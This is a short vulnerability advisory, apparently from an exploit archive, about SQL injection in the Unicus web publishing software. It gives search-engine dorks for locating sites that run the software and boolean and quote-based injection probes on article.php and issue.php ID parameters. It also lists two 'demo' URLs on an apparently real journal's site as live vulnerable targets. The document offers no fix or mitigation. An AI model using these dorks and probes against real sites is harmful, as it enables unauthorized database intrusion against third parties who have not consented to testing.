[+] Title: Unicus SQL Injection [+] Author: h4shur [+] date:2020-11-07 [+] Vendor Homepage: https://www.unicusmarketing.com/ [+] Software Link: https://www.unicusmarketing.com/ [+] Tested on: Windows 10 & Google Chrome [+] Category : Web Application Bugs [+} Dork : intext:"Powered by Unicus" intext:"Powered by Unicus" inurl:"article.php?ID=" intext:"Powered by Unicus" inurl:"issue.php?ID=" intext:"Powered by Unicus" inurl:".php?ID=" ### Note: [+] Add the quotation mark (') to the end of the link : * Target.com/article.php?ID==4' [+] First add "and 1 = 1" and then "and 1 = 2" to the end of the link : * Target.com/article.php?ID=4 and 1=1 * Target.com/article.php?ID=4 and 1=2 ### Demo: [+] http://animalbehaviorandcognition.org/issue.php?id=25 [+] http://animalbehaviorandcognition.org/article.php?id=1140 ### Contact Me : * Email : [email protected] * twitter : @h4shur * Telegram : @h4shur * Instagram : @netedit0r